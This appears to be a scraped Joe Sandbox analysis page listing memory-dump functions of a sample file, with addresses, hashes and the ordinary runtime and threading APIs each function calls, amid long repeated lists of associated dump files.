Associated: 00000001.00000002.2197793728.0000000001129000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197793728.0000000001148000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197836095.0000000001175000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197852578.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197867704.0000000001177000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197888161.000000000117D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197904103.000000000117F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197921784.000000000118D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197937546.000000000118F000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_e70000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 69368e33383e1e94eef2ceab35efabe13634146fb6e6488aa9fcdc9ed388e530
Instruction ID: 01b8c2fe161bec9596e6f4d57a6c08045990d0b42fcc003a2acae7b04282d03d
Opcode Fuzzy Hash: 69368e33383e1e94eef2ceab35efabe13634146fb6e6488aa9fcdc9ed388e530
Instruction Fuzzy Hash: F7112B7720018283E60C862DDBB45F7A79EEBC53297EC637AD081BB758DA23D945D600

Function 00EAA302 Relevance: .0, Instructions: 22COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2196086802.0000000000E71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000001.00000002.2196066173.0000000000E70000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2196086802.0000000000ED2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2196175328.0000000000ED9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2196190868.0000000000EDB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2196209795.0000000000EE7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2196754597.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2196803010.0000000001046000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2196861541.0000000001060000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2196929723.0000000001062000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197025606.0000000001064000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197025606.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197226626.0000000001071000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197274526.0000000001072000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197319993.0000000001073000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197336056.0000000001074000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197351405.0000000001075000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197368124.0000000001077000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197387878.0000000001087000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197406058.0000000001088000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197421861.0000000001090000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197436156.0000000001091000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197456283.000000000109B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197483072.00000000010B0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197496941.00000000010B1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197511577.00000000010B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197534330.00000000010CE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197552110.00000000010D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197573093.00000000010D7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197588614.00000000010D9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197603661.00000000010DA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197621231.00000000010DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197636461.00000000010DF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197652075.00000000010E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197667145.00000000010EC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197684755.00000000010ED000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197701941.00000000010F5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197721155.00000000010F9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197741991.000000000110B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197758687.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197778523.0000000001123000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197793728.0000000001129000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197793728.0000000001148000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197836095.0000000001175000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197852578.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197867704.0000000001177000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197888161.000000000117D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197904103.000000000117F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197921784.000000000118D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197937546.000000000118F000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_e70000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8bfb7b8e78c370f2913f61a25c6defe040cdd2114a4e27868ad6e7523cb31ccb
Instruction ID: 8e4e29927f998fa0ba79020b88d5162ce43ae3b6edccc8ebf7a6225d5afb119b
Opcode Fuzzy Hash: 8bfb7b8e78c370f2913f61a25c6defe040cdd2114a4e27868ad6e7523cb31ccb
Instruction Fuzzy Hash: 01E08C32921228EBCB14DB98C90498EF7FCEB4AB00B6910A6F501E7151C370EE08C7D0

Function 00E72EC0 Relevance: 10.8, APIs: 7, Instructions: 272threadCOMMON

Download Yara Rule

APIs

__Mtx_unlock.LIBCPMT ref: 00E72F5F
GetCurrentThreadId.KERNEL32 ref: 00E72F7E
__Mtx_unlock.LIBCPMT ref: 00E72FCC
__Cnd_broadcast.LIBCPMT ref: 00E72FE3
__Mtx_unlock.LIBCPMT ref: 00E730F5
GetCurrentThreadId.KERNEL32 ref: 00E73132
__Mtx_unlock.LIBCPMT ref: 00E7319B

Memory Dump Source

Source File: 00000001.00000002.2196086802.0000000000E71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000001.00000002.2196066173.0000000000E70000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2196086802.0000000000ED2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2196175328.0000000000ED9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2196190868.0000000000EDB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2196209795.0000000000EE7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2196754597.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2196803010.0000000001046000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2196861541.0000000001060000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2196929723.0000000001062000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197025606.0000000001064000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197025606.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197226626.0000000001071000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197274526.0000000001072000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197319993.0000000001073000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197336056.0000000001074000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197351405.0000000001075000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197368124.0000000001077000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197387878.0000000001087000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197406058.0000000001088000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197421861.0000000001090000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197436156.0000000001091000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197456283.000000000109B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197483072.00000000010B0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197496941.00000000010B1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197511577.00000000010B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197534330.00000000010CE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197552110.00000000010D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197573093.00000000010D7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197588614.00000000010D9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197603661.00000000010DA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197621231.00000000010DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197636461.00000000010DF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197652075.00000000010E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197667145.00000000010EC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197684755.00000000010ED000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197701941.00000000010F5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197721155.00000000010F9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197741991.000000000110B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197758687.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197778523.0000000001123000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197793728.0000000001129000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197793728.0000000001148000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197836095.0000000001175000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197852578.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197867704.0000000001177000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197888161.000000000117D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197904103.000000000117F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197921784.000000000118D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197937546.000000000118F000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_e70000_file.jbxd

Yara matches

Similarity

API ID: Mtx_unlock$CurrentThread$Cnd_broadcast
String ID:
API String ID: 57040152-0
Opcode ID: e4b64df65ee7bf863279409f2baa8bed57b514214c2026cedc0023781046d43c
Instruction ID: 7b186f85536e223039e2002086f9285c7adeb242705e01b8a84d26c9efad75d3
Opcode Fuzzy Hash: e4b64df65ee7bf863279409f2baa8bed57b514214c2026cedc0023781046d43c
Instruction Fuzzy Hash: 61A1E3B0A016059FDB21EF74C944B9AB7E8FF15318F149169E81DF7281EB31DA04DBA1

Function 00EACBDF Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 320COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 00EACC66

Strings

v, xrefs: 00EACBE1

Memory Dump Source

Source File: 00000001.00000002.2196086802.0000000000E71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000001.00000002.2196066173.0000000000E70000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2196086802.0000000000ED2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2196175328.0000000000ED9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2196190868.0000000000EDB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2196209795.0000000000EE7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2196754597.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2196803010.0000000001046000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2196861541.0000000001060000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2196929723.0000000001062000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197025606.0000000001064000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197025606.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197226626.0000000001071000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197274526.0000000001072000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197319993.0000000001073000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197336056.0000000001074000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197351405.0000000001075000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197368124.0000000001077000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197387878.0000000001087000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197406058.0000000001088000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197421861.0000000001090000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197436156.0000000001091000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197456283.000000000109B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197483072.00000000010B0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197496941.00000000010B1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197511577.00000000010B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197534330.00000000010CE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197552110.00000000010D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197573093.00000000010D7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197588614.00000000010D9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197603661.00000000010DA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197621231.00000000010DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197636461.00000000010DF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197652075.00000000010E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197667145.00000000010EC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197684755.00000000010ED000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197701941.00000000010F5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197721155.00000000010F9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197741991.000000000110B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197758687.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197778523.0000000001123000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197793728.0000000001129000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197793728.0000000001148000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197836095.0000000001175000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197852578.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197867704.0000000001177000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197888161.000000000117D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197904103.000000000117F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197921784.000000000118D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197937546.000000000118F000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_e70000_file.jbxd

Yara matches

Similarity

API ID: _strrchr
String ID: v
API String ID: 3213747228-1361604894
Opcode ID: e735d7118d15e2b04af68ee7be9476ee50b6c15cebd4be360e770f4c3f107c3f
Instruction ID: d6869f64b0091971d7ea790749ad6a8d5497a36bd410fcc680214e92ed74c0e4
Opcode Fuzzy Hash: e735d7118d15e2b04af68ee7be9476ee50b6c15cebd4be360e770f4c3f107c3f
Instruction Fuzzy Hash: 49B10432A046459FDB15CF28C8817FEBBE5EF4A354F24916AD855FF241D634AD01CBA0

Function 00E8BB72 Relevance: 6.1, APIs: 4, Instructions: 80COMMON

Download Yara Rule

APIs

_xtime_get.LIBCPMT ref: 00E8BBCA
__Xtime_diff_to_millis2.LIBCPMT ref: 00E8BBE4
_xtime_get.LIBCPMT ref: 00E8BC07
__Xtime_diff_to_millis2.LIBCPMT ref: 00E8BC13

Memory Dump Source

Source File: 00000001.00000002.2196086802.0000000000E71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000001.00000002.2196066173.0000000000E70000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2196086802.0000000000ED2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2196175328.0000000000ED9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2196190868.0000000000EDB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2196209795.0000000000EE7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2196754597.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2196803010.0000000001046000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2196861541.0000000001060000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2196929723.0000000001062000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197025606.0000000001064000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197025606.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197226626.0000000001071000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197274526.0000000001072000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197319993.0000000001073000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197336056.0000000001074000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197351405.0000000001075000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197368124.0000000001077000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197387878.0000000001087000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197406058.0000000001088000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197421861.0000000001090000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197436156.0000000001091000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197456283.000000000109B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197483072.00000000010B0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197496941.00000000010B1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197511577.00000000010B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197534330.00000000010CE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197552110.00000000010D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197573093.00000000010D7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197588614.00000000010D9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197603661.00000000010DA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197621231.00000000010DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197636461.00000000010DF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197652075.00000000010E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197667145.00000000010EC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197684755.00000000010ED000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197701941.00000000010F5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197721155.00000000010F9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197741991.000000000110B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197758687.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197778523.0000000001123000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197793728.0000000001129000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197793728.0000000001148000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197836095.0000000001175000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197852578.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197867704.0000000001177000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197888161.000000000117D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197904103.000000000117F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197921784.000000000118D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197937546.000000000118F000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_e70000_file.jbxd

Yara matches

Similarity

API ID: Xtime_diff_to_millis2_xtime_get
String ID:
API String ID: 531285432-0
Opcode ID: 288e06b9e9e898109e5fbe51983b63111469c5c766fdda24fd38f2584396c21d
Instruction ID: e3eeba2734bae90a898cbf7fac7ee133a76cdb3548d597e648c271a3560414a3
Opcode Fuzzy Hash: 288e06b9e9e898109e5fbe51983b63111469c5c766fdda24fd38f2584396c21d
Instruction Fuzzy Hash: AB212C71A00119AFDF00EFA4DC81DBEB7B9EF49714F201029FA09B7261DB309D019BA0

Function 00EAF35F Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 113COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 00EAF3A3

Strings

`', xrefs: 00EAF375
8", xrefs: 00EAF44B

Memory Dump Source

Source File: 00000001.00000002.2196086802.0000000000E71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000001.00000002.2196066173.0000000000E70000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2196086802.0000000000ED2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2196175328.0000000000ED9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2196190868.0000000000EDB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2196209795.0000000000EE7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2196754597.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2196803010.0000000001046000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2196861541.0000000001060000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2196929723.0000000001062000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197025606.0000000001064000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197025606.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197226626.0000000001071000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197274526.0000000001072000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197319993.0000000001073000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197336056.0000000001074000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197351405.0000000001075000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197368124.0000000001077000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197387878.0000000001087000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197406058.0000000001088000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197421861.0000000001090000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197436156.0000000001091000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197456283.000000000109B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197483072.00000000010B0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197496941.00000000010B1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197511577.00000000010B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197534330.00000000010CE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197552110.00000000010D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197573093.00000000010D7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197588614.00000000010D9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197603661.00000000010DA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197621231.00000000010DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197636461.00000000010DF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197652075.00000000010E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197667145.00000000010EC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197684755.00000000010ED000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197701941.00000000010F5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197721155.00000000010F9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197741991.000000000110B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197758687.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197778523.0000000001123000.00000080.00000001.01000000.00000003.sdmpDownload File
